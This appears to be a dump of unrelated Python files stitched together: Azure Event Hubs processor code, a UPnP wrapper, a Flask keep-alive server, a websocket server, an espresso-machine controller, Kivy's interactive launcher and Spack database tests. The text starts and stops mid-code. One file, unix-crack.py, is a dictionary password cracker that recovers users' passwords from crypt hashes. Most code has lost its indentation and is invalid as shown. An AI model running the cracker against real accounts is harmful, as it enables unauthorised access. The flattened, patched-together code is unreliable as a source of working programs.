self._create_tasks_for_claimed_ownership(
newly_claimed_pids, checkpoints
)
else:
_LOGGER.info(
"EventProcessor %r hasn't claimed an ownership. It keeps claiming.",
self._id,
)
to_cancel_pids = set(self._consumers.keys())
if to_cancel_pids:
self._cancel_tasks_for_partitions(to_cancel_pids)
except Exception as err: # pylint:disable=broad-except
# ownership_manager.get_checkpoints() and ownership_manager.claim_ownership() may raise exceptions
# when there are load balancing and/or checkpointing (checkpoint_store isn't None).
# They're swallowed here to retry every self._load_balancing_interval seconds.
# Meanwhile this event processor won't lose the partitions it has claimed before.
# If it keeps failing, other EventProcessors will start to claim ownership of the partitions
# that this EventProcessor is working on. So two or multiple EventProcessors may be working
# on the same partition for a short while.
# Setting owner_level would create exclusive connection to the partition and
# alleviate duplicate-receiving greatly.
_LOGGER.warning(
"EventProcessor instance %r of eventhub %r consumer group %r. "
"An error occurred while load-balancing and claiming ownership. "
"The exception is %r. Retrying after %r seconds",
self._id,
self._eventhub_name,
self._consumer_group,
err,
load_balancing_interval
)
self._process_error(None, err) # type: ignore
time.sleep(load_balancing_interval)
def _close_consumer(self, partition_id, consumer, reason):
# type: (str, EventHubConsumer, CloseReason) -> None
consumer.close()
with self._lock:
del self._consumers[partition_id]
_LOGGER.info(
"PartitionProcessor of EventProcessor instance %r of eventhub %r partition %r consumer group %r"
" is being closed. Reason is: %r",
self._id,
self._partition_contexts[partition_id].eventhub_name,
self._partition_contexts[partition_id].partition_id,
self._partition_contexts[partition_id].consumer_group,
reason,
)
if self._partition_close_handler:
try:
self._partition_close_handler(self._partition_contexts[partition_id], reason)
except Exception as err: # pylint:disable=broad-except
_LOGGER.warning(
"EventProcessor instance %r of eventhub %r partition %r consumer group %r. "
"An error occurred while running on_partition_close. The exception is %r.",
self._id,
self._partition_contexts[partition_id].eventhub_name,
self._partition_contexts[partition_id].partition_id,
self._partition_contexts[partition_id].consumer_group,
err,
)
self._process_error(self._partition_contexts[partition_id], err)
self._ownership_manager.release_ownership(partition_id)
def _do_receive(self, partition_id, consumer):
# type: (str, EventHubConsumer) -> None
"""Call the consumer.receive() and handle exceptions if any after it exhausts retries.
"""
try:
consumer.receive(self._batch, self._max_batch_size, self._max_wait_time)
except Exception as error: # pylint:disable=broad-except
_LOGGER.warning(
"EventProcessor instance %r of eventhub %r partition %r consumer group %r. "
"An error occurred while receiving. The exception is %r.",
self._id,
self._partition_contexts[partition_id].eventhub_name,
self._partition_contexts[partition_id].partition_id,
self._partition_contexts[partition_id].consumer_group,
error,
)
self._process_error(self._partition_contexts[partition_id], error)
self._close_consumer(
partition_id, consumer, CloseReason.OWNERSHIP_LOST
)
def start(self):
# type: () -> None
if self._running:
_LOGGER.info("EventProcessor %r has already started.", self._id)
return
_LOGGER.info("EventProcessor %r is being started", self._id)
self._running = True
thread = threading.Thread(target=self._load_balancing)
thread.daemon = True
thread.start()
while self._running:
for partition_id, consumer in list(self._consumers.items()):
if consumer.stop:
self._close_consumer(
partition_id, consumer, CloseReason.OWNERSHIP_LOST
)
continue
self._do_receive(partition_id, consumer)
with self._lock:
for partition_id, consumer in list(self._consumers.items()):
self._close_consumer(partition_id, consumer, CloseReason.SHUTDOWN)
def stop(self):
# type: () -> None
"""Stop the EventProcessor.
The EventProcessor will stop receiving events from EventHubs and release the ownership of the partitions
it is working on.
        Other running EventProcessors will take over these released partitions.
A stopped EventProcessor can be restarted by calling method `start` again.
:return: None
"""
if not self._running:
_LOGGER.info("EventProcessor %r has already been stopped.", self._id)
return
self._running = False
_LOGGER.info("EventProcessor %r has been stopped.", self._id)
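# Hedged usage sketch (not part of this module's API): an EventProcessor is normally driven
# indirectly through the public EventHubConsumerClient. The connection string, event hub
# name and consumer group below are placeholders, and this function is never called here.
def _example_consumer_client():
    from azure.eventhub import EventHubConsumerClient

    def on_event(partition_context, event):
        # Handle the event, then record progress through the checkpoint store (if configured).
        print(partition_context.partition_id, event)
        partition_context.update_checkpoint(event)

    client = EventHubConsumerClient.from_connection_string(
        conn_str="<EVENT HUB CONNECTION STRING>",   # placeholder
        consumer_group="$Default",
        eventhub_name="<EVENT HUB NAME>",           # placeholder
    )
    with client:
        client.receive(on_event=on_event, starting_position="-1")  # "-1" reads from the beginning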
|
upnp.py
|
import logging
import threading
from queue import Queue
try:
import miniupnpc
except ImportError:
pass
log = logging.getLogger(__name__)
class UPnP:
def __init__(self):
self.queue = Queue()
def run():
try:
self.upnp = miniupnpc.UPnP()
self.upnp.discoverdelay = 30
self.upnp.discover()
self.upnp.selectigd()
keep_going = True
while keep_going:
msg = self.queue.get()
if msg[0] == "remap":
port = msg[1]
log.info(f"Attempting to enable UPnP (open up port {port})")
self.upnp.deleteportmapping(port, "TCP")
self.upnp.addportmapping(port, "TCP", self.upnp.lanaddr, port, "tst", "")
log.info(
f"Port {port} opened with UPnP. lanaddr {self.upnp.lanaddr} "
f"external: {self.upnp.externalipaddress()}"
)
elif msg[0] == "release":
port = msg[1]
self.upnp.deleteportmapping(port, "TCP")
log.info(f"Port {port} closed with UPnP")
elif msg[0] == "shutdown":
keep_going = False
except Exception as e:
                log.info(
                    "UPnP failed. This is not required to run tst; it only allows incoming connections from other peers."
                )
log.info(e)
self.thread = threading.Thread(target=run)
self.thread.start()
def remap(self, port):
self.queue.put(("remap", port))
def release(self, port):
self.queue.put(("release", port))
def shutdown(self):
self.queue.put(("shutdown",))
self.thread.join()
def __del__(self):
self.shutdown()
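# Hedged usage sketch for the wrapper above; the port number is illustrative and each call
# only enqueues work for the background thread started in __init__.
if __name__ == "__main__":
    upnp = UPnP()       # starts UPnP discovery in a background thread
    upnp.remap(8444)    # ask the gateway to forward TCP port 8444 to this host
    input("Press Enter to remove the mapping and exit...")
    upnp.release(8444)
    upnp.shutdown()     # stops the worker thread (also called from __del__)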
|
unix-crack.py
|
import argparse
import crypt
import threading
from multiprocessing import Pool, Queue
queue = Queue()
def test_pass(user, crypt_pass, dict_words):
salt = crypt_pass[0:2]
for word in dict_words:
crypt_word = crypt.crypt(word, salt)
if crypt_word.strip() == crypt_pass.strip():
queue.put('Password for %s is: %s' % (user, word))
return
queue.put('Password for %s not found' % user)
class UnixPasswordCracker(object):
"""
    Uses a simple dictionary-based brute-force attack to guess a user's
    password by hashing each dictionary word and checking for equality
    against the existing hash.
    Input files:
    passwords.txt  - user:hash entries to crack, one per line
    dictionary.txt - candidate words, one per line
"""
pool = Pool(processes=5)
def use_threading(self, func, args):
thread = threading.Thread(target=func, args=args)
thread.start()
thread.join()
def use_multithreaded_pools(self, func, args):
return self.pool.apply_async(func, args)
def main(self, mode=None):
dictionary = 'dictionary.txt'
with open(dictionary, 'r') as f:
dict_words = [line.strip('\n').strip() for line in f.readlines()]
passwords = 'passwords.txt'
with open(passwords, 'r') as f:
for line in f.readlines():
if ":" in line:
user = line.split(':')[0]
crypt_pass = line.split(':')[1].strip(' ')
args = [user, crypt_pass, dict_words]
if mode == 'threading':
self.use_threading(test_pass, args)
elif mode == 'pool':
self.use_multithreaded_pools(test_pass, args)
else:
test_pass(*args)
self.pool.close()
self.pool.join()
# print the queue items
while not queue.empty():
print(queue.get())
if __name__ == "__main__":
mode = None
parser = argparse.ArgumentParser()
parser.add_argument("--mode", help="Valid choices: 'pool' and 'threading'")
args = parser.parse_args()
if args.mode:
mode = args.mode
UnixPasswordCracker().main(mode=mode)
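# Hedged sketch (illustrative only): the salt/hash comparison that test_pass() relies on,
# shown for a single made-up password. The crypt module is Unix-only; the word "egg" and
# the salt "HX" are arbitrary examples.
def _example_crypt_check():
    crypt_pass = crypt.crypt("egg", "HX")    # what an /etc/passwd-style entry would store
    salt = crypt_pass[0:2]                   # the first two characters are the salt
    assert crypt.crypt("egg", salt) == crypt_pass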
|
keep_alive.py
|
from flask import Flask
from threading import Thread
import random
app = Flask('')
@app.route('/')
def home():
return 'Im in!'
def run():
app.run(
host='0.0.0.0',
port=random.randint(2000,9000)
)
def keep_alive():
'''
    Creates and starts a new thread that runs the function run.
'''
t = Thread(target=run)
t.start()
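# Hedged usage sketch: keep_alive() is meant to be called once from the main script
# (for example a bot) so the Flask server keeps the host reachable in the background.
if __name__ == "__main__":
    keep_alive()
    # ...the rest of the program (e.g. a bot's event loop) would continue here...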
|
main.py
|
import asyncio
import json
import logging
import websockets
import os
import threading
import socket
from utils.crypto import encryptImage
from utils.socket import recvall
# Env
SERVER_PORT = int(os.getenv('SERVER_PORT', 6789))
SERVER_URL = os.getenv('SERVER_URL', "localhost")
# Setup logging
logging.basicConfig()
# Body response
CONNECTED_RESPONSE = {
"status": "ok",
"type": "info",
"response": "Connection established"
}
async def handleEncryptImage(ws, image):
#Create socket connection
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("localhost", 6791))
    s.sendall(json.dumps({
        "option": "processImage",
        "data": encryptImage(image).decode()
    }).encode())
response = recvall(s).decode()
parsedRes = json.loads(response)
await ws.send(json.dumps({
"status": "ok",
"type": "result_image",
"image": parsedRes['image']
}))
async def init_connection(websocket, path):
try:
await websocket.send(json.dumps(CONNECTED_RESPONSE))
async for message in websocket:
data = json.loads(message)
if data['option'] == 'uploadImage':
_thread = threading.Thread(target=asyncio.run, args=(handleEncryptImage(websocket, data['image'] ),))
_thread.start()
    except Exception as e:
        print("Error handling websocket connection:", e)
# Start server
start_server = websockets.serve(init_connection, SERVER_URL, SERVER_PORT)
asyncio.get_event_loop().run_until_complete(start_server)
asyncio.get_event_loop().run_forever()
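# Hedged sketch of a matching client (illustrative only; it is defined after the blocking
# run_forever() call, so it is never executed here). The URI and base64 payload are
# placeholders; run it separately with e.g. asyncio.run(_example_client()).
async def _example_client(uri="ws://localhost:6789", image_b64="<base64-encoded image>"):
    async with websockets.connect(uri) as ws:
        print(await ws.recv())   # the CONNECTED_RESPONSE greeting
        await ws.send(json.dumps({"option": "uploadImage", "image": image_b64}))
        print(await ws.recv())   # the result_image response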
|
silvia-pi.py
|
#!/usr/bin/python3
import logging
from datetime import datetime as dt
logger = logging.getLogger('silvia')
logger.setLevel(logging.INFO)
fh = logging.FileHandler('/home/pi/silvia-pi/logs/%s.log' % dt.strftime(dt.now(), '%Y-%m-%d'))
fh.setLevel(logging.INFO)
formatter = logging.Formatter('%(asctime)s - %(name)s - %(levelname)s - %(message)s')
fh.setFormatter(formatter)
logger.addHandler(fh)
def he_control_loop(lock,state):
from heat import Heat
try:
heat_control = Heat(state)
heat_control.run()
except Exception as e:
logger.error(e)
finally:
logger.info("----------------Closing heat control----------------")
heat_control.cleanup()
def pid_loop(lock,state):
from sensor import Sensor
try:
pid = Sensor(state)
pid.run()
except Exception as e:
logger.error(e)
finally:
logger.info("--------------------Closing PID---------------------")
pid.cleanup()
def pygame_gui(lock, state):
from chart import Chart
try:
Chart.start_pygame()
c = Chart(0.5, 30, state)
c.run()
except Exception as e:
logger.error(e)
finally:
logger.info("--------------------Closing GUI---------------------")
Chart.stop_pygame()
def gpio_temp_control(lock, state):
from gpiozero import Button
from time import time
from config import config
import os
os.system('gpio -g mode 18 pwm | gpio pwmc 1000 | gpio -g pwm 18 800')
def increase():
logger.info("Increase button pressed")
state['settemp'] += 0.2
config.set_temp = state['settemp']
config.save()
def decrease():
logger.info("Decrease button pressed")
state['settemp'] -= 0.2
config.set_temp = state['settemp']
config.save()
def toggle():
logger.info("Exit button pressed")
state['on'] = not state['on']
if state['on']:
os.system('gpio -g pwm 18 800')
else:
os.system('gpio -g pwm 18 100')
def set_boost():
logger.info("Heating for 5 seconds")
state['boost'] = time() + 5
up = Button(17)
up.when_pressed = increase
down = Button(22)
down.when_pressed = decrease
kill = Button(27)
kill.when_pressed = toggle
boost = Button(23)
boost.when_pressed = set_boost
return up, down, kill, boost
def print_exception(*info):
import traceback
tb = ''.join(traceback.format_exception(*info))
logger.error("Uncaught error: ")
logger.error(tb)
if __name__ == '__main__':
from multiprocessing import Process, Manager, Lock
from time import sleep
from config import config as conf
import sys
from formatter import PartialFormatter
sys.excepthook = print_exception
lock = Lock()
manager = Manager()
pidstate = manager.dict()
pidstate['snooze'] = conf.snooze
pidstate['snoozeon'] = False
pidstate['i'] = 0
pidstate['settemp'] = conf.set_temp
pidstate['avgpid'] = 0.
pidstate['temp'] = 0.
pidstate['heating'] = False
pidstate['avgtemp'] = None
pidstate['exit'] = False
pidstate['pterm'] = None
pidstate['iterm'] = None
pidstate['dterm'] = None
pidstate['sterm'] = None
pidstate['pidval'] = None
pidstate['boost'] = 0
pidstate['on'] = True
pidstate['gui_on'] = False
logger.info('Main process started')
logger.info('Starting PID loop')
p = Process(target=pid_loop,args=(lock, pidstate))
p.daemon = True
p.start()
logger.info('Starting heat control')
h = Process(target=he_control_loop,args=(lock, pidstate))
h.daemon = True
h.start()
logger.info('Starting GUI')
gui = Process(target=pygame_gui, args=(lock, pidstate))
gui.daemon = True
gui.start()
while not pidstate['gui_on']:
sleep(1)
up, down, kill, boost = gpio_temp_control(lock, pidstate)
logger.info('Buttons assigned')
logger.info('Starting status loop')
fmt = PartialFormatter()
dir(fmt)
    while p.is_alive() and gui.is_alive() and h.is_alive() and not pidstate['exit']:
try:
print(fmt.format('P: {pterm:7.2f}\tI: {iterm:7.2f}\tD: {dterm:7.2f}\tS: {sterm:7.2f}\tOut: {pidval:7.2f} Avg PID: {avgpid:7.2f}\tTemp: {temp:7.2f}\tAvg Temp: {avgtemp:7.2f}', **pidstate))
sleep(1)
except KeyboardInterrupt:
logger.error('Keyboard interrupt, exiting')
break
except Exception as e:
logger.error('Error in status loop:')
logger.error(str(e))
break
logger.info('Killing PID process')
p.terminate()
logger.info('Killing heat control process')
h.terminate()
logger.info('Killing GUI process')
gui.terminate()
p.join()
h.join()
gui.join()
    logger.info('All processes joined, exiting')
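# Hedged sketch (illustrative only, never called from this script): the Manager-dict
# pattern used above for sharing PID state between processes, reduced to a minimal,
# self-contained example. The key name 'temp' is arbitrary.
def _example_worker(state):
    state['temp'] = 92.5                    # visible to the parent through the manager proxy

def _example_shared_state():
    from multiprocessing import Manager, Process
    with Manager() as manager:
        state = manager.dict({'temp': 0.0})
        p = Process(target=_example_worker, args=(state,))
        p.start()
        p.join()
        assert state['temp'] == 92.5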
|
interactive.py
|
'''
Interactive launcher
====================
.. versionadded:: 1.3.0
.. versionchanged:: 1.9.2
The interactive launcher has been deprecated.
The :class:`InteractiveLauncher` provides a user-friendly python shell
interface to an :class:`App` so that it can be prototyped and debugged
interactively.
.. note::
The Kivy API intends for some functions to only be run once or before the
main EventLoop has started. Methods that can normally be called during the
course of an application will work as intended, but specifically overriding
methods such as :meth:`on_touch` dynamically leads to trouble.
Creating an InteractiveLauncher
-------------------------------
Take your existing subclass of :class:`App` (this can be production code) and
pass an instance to the :class:`InteractiveLauncher` constructor. ::
from kivy.interactive import InteractiveLauncher
from kivy.app import App
from kivy.uix.button import Button
class MyApp(App):
def build(self):
return Button(text='Hello Shell')
launcher = InteractiveLauncher(MyApp())
launcher.run()
After pressing *enter*, the script will return. This allows the interpreter to
continue running. Inspection or modification of the :class:`App` can be done
safely through the InteractiveLauncher instance or the provided
:class:`SafeMembrane` class instances.
.. note::
If you want to test this example, start Python without any file to have
already an interpreter, and copy/paste all the lines. You'll still have the
interpreter at the end + the kivy application running.
Interactive Development
-----------------------
IPython provides a fast way to learn the Kivy API. The :class:`App` instance
and all of its attributes, including methods and the entire widget tree,
can be quickly listed by using the '.' operator and pressing 'tab'. Try this
code in an IPython shell. ::
from kivy.interactive import InteractiveLauncher
from kivy.app import App
from kivy.uix.widget import Widget
from kivy.graphics import Color, Ellipse
class MyPaintWidget(Widget):
def on_touch_down(self, touch):
with self.canvas:
Color(1, 1, 0)
d = 30.
Ellipse(pos=(touch.x - d/2, touch.y - d/2), size=(d, d))
class TestApp(App):
def build(self):
return Widget()
i = InteractiveLauncher(TestApp())
i.run()
i. # press 'tab' to list attributes of the app
i.root. # press 'tab' to list attributes of the root widget
# App is boring. Attach a new widget!
i.root.add_widget(MyPaintWidget())
i.safeIn()
# The application is now blocked.
# Click on the screen several times.
i.safeOut()
# The clicks will show up now
# Erase artwork and start over
i.root.canvas.clear()
.. note::
All of the proxies used in the module store their referent in the
:attr:`_ref` attribute, which can be accessed directly if needed, such as
for getting doc strings. :func:`help` and :func:`type` will access the
proxy, not its referent.
Directly Pausing the Application
--------------------------------
Both the :class:`InteractiveLauncher` and :class:`SafeMembrane` hold internal
references to the :class:`EventLoop`'s 'safe' and 'confirmed'
:class:`threading.Event` objects. You can use their safing methods to control
the application manually.
:meth:`SafeMembrane.safeIn` will cause the application to pause and
:meth:`SafeMembrane.safeOut` will allow a paused application
to continue running. This is potentially useful for scripting actions into
functions that need the screen to update etc.
.. note::
The pausing is implemented via the
:class:`Clocks' <kivy.clock.Clock>`
:meth:`~kivy.clock.ClockBase.schedule_once` method
and occurs before the start of each frame.
Adding Attributes Dynamically
-----------------------------
.. note::
This module uses threading and object proxies to encapsulate the running
:class:`App`. Deadlocks and memory corruption can occur if making direct
references inside the thread without going through the provided proxy(s).
The :class:`InteractiveLauncher` can have attributes added to it exactly like a
normal object and if these were created from outside the membrane, they will
not be threadsafe because the external references to them in the python
interpreter do not go through InteractiveLauncher's membrane behavior,
inherited from :class:`SafeMembrane`.
To threadsafe these external references, simply assign them to
:class:`SafeMembrane` instances of themselves like so::
from kivy.interactive import SafeMembrane
interactiveLauncher.attribute = myNewObject
# myNewObject is unsafe
myNewObject = SafeMembrane(myNewObject)
# myNewObject is now safe. Call at will.
myNewObject.method()
TODO
====
Unit tests, examples, and a better explanation of which methods are safe in a
running application would be nice. All three would be excellent.
Could be re-written with a context-manager style i.e. ::
with safe:
foo()
Any use cases besides compacting code?
'''
__all__ = ('SafeMembrane', 'InteractiveLauncher')
import inspect
from threading import Thread, Event
from kivy.app import App
from kivy.base import EventLoop
from kivy.clock import Clock
from kivy.utils import deprecated
def safeWait(dt):
EventLoop.confirmed.set()
EventLoop.safe.wait()
EventLoop.confirmed.clear()
def unwrap(ob):
while type(ob) == SafeMembrane:
ob = ob._ref
return ob
class SafeMembrane(object):
'''
This help is for a proxy object. Did you want help on the proxy's referent
instead? Try using help(<instance>._ref)
The SafeMembrane is a threadsafe proxy that also returns attributes as new
thread-safe objects
and makes thread-safe method calls, preventing thread-unsafe objects
from leaking into the user's environment.
'''
__slots__ = ('_ref', 'safe', 'confirmed')
def __init__(self, ob, *args, **kwargs):
self.confirmed = EventLoop.confirmed
self.safe = EventLoop.safe
self._ref = ob
def safeIn(self):
"""Provides a thread-safe entry point for interactive launching."""
self.safe.clear()
Clock.schedule_once(safeWait, -1)
self.confirmed.wait()
def safeOut(self):
"""Provides a thread-safe exit point for interactive launching."""
self.safe.set()
def isMethod(self, fn):
return inspect.ismethod(fn)
# Everything from this point on is just a series of thread-safing proxy
# methods that make calls against _ref and threadsafe whenever data will be
# written to or if a method will be called. SafeMembrane instances should
# be unwrapped whenever passing them into the thread
# use type() to determine if an object is a SafeMembrane while debugging
def __repr__(self):
return self._ref.__repr__()
def __call__(self, *args, **kw):
self.safeIn()
args = list(map(unwrap, args))
for k in list(kw.keys()):
kw[k] = unwrap(kw[k])
r = self._ref(*args, **kw)
self.safeOut()
if r is not None:
return SafeMembrane(r)
def __getattribute__(self, attr, oga=object.__getattribute__):
if attr.startswith('__') or attr == '_ref':
subject = oga(self, '_ref')
if attr == '_ref':
return subject
return getattr(subject, attr)
return oga(self, attr)
def __getattr__(self, attr, oga=object.__getattribute__):
r = getattr(oga(self, '_ref'), attr)
return SafeMembrane(r)
def __setattr__(self, attr, val, osa=object.__setattr__):
if (attr == '_ref' or
hasattr(type(self), attr) and not attr.startswith('__')):
osa(self, attr, val)
else:
self.safeIn()
val = unwrap(val)
setattr(self._ref, attr, val)
self.safeOut()
def __delattr__(self, attr, oda=object.__delattr__):
self.safeIn()
delattr(self._ref, attr)
self.safeOut()
def __bool__(self):
return bool(self._ref)
def __getitem__(self, arg):
return SafeMembrane(self._ref[arg])
def __setitem__(self, arg, val):
self.safeIn()
val = unwrap(val)
self._ref[arg] = val
self.safeOut()
def __delitem__(self, arg):
self.safeIn()
del self._ref[arg]
self.safeOut()
def __getslice__(self, i, j):
return SafeMembrane(self._ref[i:j])
def __setslice__(self, i, j, val):
self.safeIn()
val = unwrap(val)
self._ref[i:j] = val
self.safeOut()
def __delslice__(self, i, j):
self.safeIn()
del self._ref[i:j]
self.safeOut()
def __enter__(self, *args, **kwargs):
self.safeIn()
self._ref.__enter__(*args, **kwargs)
def __exit__(self, *args, **kwargs):
self._ref.__exit__(*args, **kwargs)
self.safeOut()
class InteractiveLauncher(SafeMembrane):
'''
Proxy to an application instance that launches it in a thread and
then returns and acts as a proxy to the application in the thread.
'''
__slots__ = ('_ref', 'safe', 'confirmed', 'thread', 'app')
@deprecated
def __init__(self, app=None, *args, **kwargs):
if app is None:
app = App()
EventLoop.safe = Event()
self.safe = EventLoop.safe
self.safe.set()
EventLoop.confirmed = Event()
self.confirmed = EventLoop.confirmed
self.app = app
def startApp(app=app, *args, **kwargs):
app.run(*args, **kwargs)
self.thread = Thread(target=startApp, *args, **kwargs)
def run(self):
self.thread.start()
# Proxy behavior starts after this is set. Before this point, attaching
# widgets etc can only be done through the Launcher's app attribute
self._ref = self.app
def stop(self):
EventLoop.quit = True
self.thread.join()
# Act like the app instance even before _ref is set
def __repr__(self):
return self.app.__repr__()
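# Hedged sketch (illustrative only, assumes a Kivy install): how unwrap() strips nested
# SafeMembrane proxies. EventLoop.safe/confirmed are prepared the same way
# InteractiveLauncher.__init__ does, purely so a proxy can be built outside a running app.
def _example_unwrap():
    EventLoop.safe = Event()
    EventLoop.safe.set()
    EventLoop.confirmed = Event()
    data = {"answer": 42}
    proxy = SafeMembrane(SafeMembrane(data))
    assert unwrap(proxy) is data    # nested proxies unwrap back to the original referent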
|
database.py
|
# Copyright 2013-2020 Lawrence Livermore National Security, LLC and other
# Spack Project Developers. See the top-level COPYRIGHT file for details.
#
# SPDX-License-Identifier: (Apache-2.0 OR MIT)
"""
These tests check the database is functioning properly,
both in memory and in its file
"""
import datetime
import functools
import multiprocessing
import os
import pytest
import json
try:
import uuid
_use_uuid = True
except ImportError:
_use_uuid = False
pass
import llnl.util.lock as lk
from llnl.util.tty.colify import colify
import spack.repo
import spack.store
import spack.database
import spack.package
import spack.spec
from spack.util.mock_package import MockPackageMultiRepo
from spack.util.executable import Executable
pytestmark = pytest.mark.db
@pytest.fixture()
def test_store(tmpdir):
real_store = spack.store.store
spack.store.store = spack.store.Store(str(tmpdir.join('test_store')))
yield
spack.store.store = real_store
@pytest.fixture()
def upstream_and_downstream_db(tmpdir_factory, gen_mock_layout):
mock_db_root = str(tmpdir_factory.mktemp('mock_db_root'))
upstream_write_db = spack.database.Database(mock_db_root)
upstream_db = spack.database.Database(mock_db_root, is_upstream=True)
# Generate initial DB file to avoid reindex
with open(upstream_write_db._index_path, 'w') as db_file:
upstream_write_db._write_to_file(db_file)
upstream_layout = gen_mock_layout('/a/')
downstream_db_root = str(
tmpdir_factory.mktemp('mock_downstream_db_root'))
downstream_db = spack.database.Database(
downstream_db_root, upstream_dbs=[upstream_db])
with open(downstream_db._index_path, 'w') as db_file:
downstream_db._write_to_file(db_file)
downstream_layout = gen_mock_layout('/b/')
yield upstream_write_db, upstream_db, upstream_layout,\
downstream_db, downstream_layout
@pytest.mark.usefixtures('config')
def test_installed_upstream(upstream_and_downstream_db):
upstream_write_db, upstream_db, upstream_layout,\
downstream_db, downstream_layout = (upstream_and_downstream_db)
default = ('build', 'link')
mock_repo = MockPackageMultiRepo()
x = mock_repo.add_package('x', [], [])
z = mock_repo.add_package('z', [], [])
y = mock_repo.add_package('y', [z], [default])
mock_repo.add_package('w', [x, y], [default, default])
with spack.repo.swap(mock_repo):
spec = spack.spec.Spec('w')
spec.concretize()
for dep in spec.traverse(root=False):
upstream_write_db.add(dep, upstream_layout)
upstream_db._read()
for dep in spec.traverse(root=False):
record = downstream_db.get_by_hash(dep.dag_hash())
assert record is not None
with pytest.raises(spack.database.ForbiddenLockError):
record = upstream_db.get_by_hash(dep.dag_hash())
new_spec = spack.spec.Spec('w')
new_spec.concretize()
downstream_db.add(new_spec, downstream_layout)
for dep in new_spec.traverse(root=False):
upstream, record = downstream_db.query_by_spec_hash(
dep.dag_hash())
assert upstream
assert record.path == upstream_layout.path_for_spec(dep)
upstream, record = downstream_db.query_by_spec_hash(
new_spec.dag_hash())
assert not upstream
assert record.installed
upstream_db._check_ref_counts()
downstream_db._check_ref_counts()
@pytest.mark.usefixtures('config')
def test_removed_upstream_dep(upstream_and_downstream_db):
upstream_write_db, upstream_db, upstream_layout,\
downstream_db, downstream_layout = (upstream_and_downstream_db)
default = ('build', 'link')
mock_repo = MockPackageMultiRepo()
z = mock_repo.add_package('z', [], [])
mock_repo.add_package('y', [z], [default])
with spack.repo.swap(mock_repo):
spec = spack.spec.Spec('y')
spec.concretize()
upstream_write_db.add(spec['z'], upstream_layout)
upstream_db._read()
new_spec = spack.spec.Spec('y')
new_spec.concretize()
downstream_db.add(new_spec, downstream_layout)
upstream_write_db.remove(new_spec['z'])
upstream_db._read()
new_downstream = spack.database.Database(
downstream_db.root, upstream_dbs=[upstream_db])
new_downstream._fail_when_missing_deps = True
with pytest.raises(spack.database.MissingDependenciesError):
new_downstream._read()
@pytest.mark.usefixtures('config')
def test_add_to_upstream_after_downstream(upstream_and_downstream_db):
"""An upstream DB can add a package after it is installed in the downstream
DB. When a package is recorded as installed in both, the results should
refer to the downstream DB.
"""
upstream_write_db, upstream_db, upstream_layout,\
downstream_db, downstream_layout = (upstream_and_downstream_db)
mock_repo = MockPackageMultiRepo()
mock_repo.add_package('x', [], [])
with spack.repo.swap(mock_repo):
spec = spack.spec.Spec('x')
spec.concretize()
downstream_db.add(spec, downstream_layout)
upstream_write_db.add(spec, upstream_layout)
upstream_db._read()
upstream, record = downstream_db.query_by_spec_hash(spec.dag_hash())
# Even though the package is recorded as installed in the upstream DB,
# we prefer the locally-installed instance
assert not upstream
qresults = downstream_db.query('x')
assert len(qresults) == 1
queried_spec, = qresults
try:
orig_db = spack.store.db
spack.store.db = downstream_db
assert queried_spec.prefix == downstream_layout.path_for_spec(spec)
finally:
spack.store.db = orig_db
@pytest.mark.usefixtures('config')
def test_cannot_write_upstream(tmpdir_factory, test_store, gen_mock_layout):
roots = [str(tmpdir_factory.mktemp(x)) for x in ['a', 'b']]
layouts = [gen_mock_layout(x) for x in ['/ra/', '/rb/']]
mock_repo = MockPackageMultiRepo()
mock_repo.add_package('x', [], [])
# Instantiate the database that will be used as the upstream DB and make
# sure it has an index file
upstream_db_independent = spack.database.Database(roots[1])
with upstream_db_independent.write_transaction():
pass
upstream_dbs = spack.store._construct_upstream_dbs_from_install_roots(
[roots[1]], _test=True)
with spack.repo.swap(mock_repo):
spec = spack.spec.Spec('x')
spec.concretize()
with pytest.raises(spack.database.ForbiddenLockError):
upstream_dbs[0].add(spec, layouts[1])
@pytest.mark.usefixtures('config')
def test_recursive_upstream_dbs(tmpdir_factory, test_store, gen_mock_layout):
roots = [str(tmpdir_factory.mktemp(x)) for x in ['a', 'b', 'c']]
layouts = [gen_mock_layout(x) for x in ['/ra/', '/rb/', '/rc/']]
default = ('build', 'link')
mock_repo = MockPackageMultiRepo()
z = mock_repo.add_package('z', [], [])
y = mock_repo.add_package('y', [z], [default])
mock_repo.add_package('x', [y], [default])
with spack.repo.swap(mock_repo):
spec = spack.spec.Spec('x')
spec.concretize()
db_c = spack.database.Database(roots[2])
db_c.add(spec['z'], layouts[2])
db_b = spack.database.Database(roots[1], upstream_dbs=[db_c])
db_b.add(spec['y'], layouts[1])
db_a = spack.database.Database(roots[0], upstream_dbs=[db_b, db_c])
db_a.add(spec['x'], layouts[0])
upstream_dbs_from_scratch = (
spack.store._construct_upstream_dbs_from_install_roots(
[roots[1], roots[2]], _test=True))
db_a_from_scratch = spack.database.Database(
roots[0], upstream_dbs=upstream_dbs_from_scratch)
assert db_a_from_scratch.db_for_spec_hash(spec.dag_hash()) == (
db_a_from_scratch)
assert db_a_from_scratch.db_for_spec_hash(spec['y'].dag_hash()) == (
upstream_dbs_from_scratch[0])
assert db_a_from_scratch.db_for_spec_hash(spec['z'].dag_hash()) == (
upstream_dbs_from_scratch[1])
db_a_from_scratch._check_ref_counts()
upstream_dbs_from_scratch[0]._check_ref_counts()
upstream_dbs_from_scratch[1]._check_ref_counts()
assert (db_a_from_scratch.installed_relatives(spec) ==
set(spec.traverse(root=False)))
assert (db_a_from_scratch.installed_relatives(
spec['z'], direction='parents') == set([spec, spec['y']]))
@pytest.fixture()
def usr_folder_exists(monkeypatch):
"""The ``/usr`` folder is assumed to be existing in some tests. This
fixture makes it such that its existence is mocked, so we have no
requirements on the system running tests.
"""
isdir = os.path.isdir
@functools.wraps(os.path.isdir)
def mock_isdir(path):
if path == '/usr':
return True
return isdir(path)
monkeypatch.setattr(os.path, 'isdir', mock_isdir)
def _print_ref_counts():
"""Print out all ref counts for the graph used here, for debugging"""
recs = []
def add_rec(spec):
cspecs = spack.store.db.query(spec, installed=any)
if not cspecs:
recs.append("[ %-7s ] %-20s-" % ('', spec))
else:
key = cspecs[0].dag_hash()
rec = spack.store.db.get_record(cspecs[0])
recs.append("[ %-7s ] %-20s%d" % (key[:7], spec, rec.ref_count))
with spack.store.db.read_transaction():
add_rec('mpileaks ^mpich')
add_rec('callpath ^mpich')
add_rec('mpich')
add_rec('mpileaks ^mpich2')
add_rec('callpath ^mpich2')
add_rec('mpich2')
add_rec('mpileaks ^zmpi')
add_rec('callpath ^zmpi')
add_rec('zmpi')
add_rec('fake')
add_rec('dyninst')
add_rec('libdwarf')
add_rec('libelf')
colify(recs, cols=3)
def _check_merkleiness():
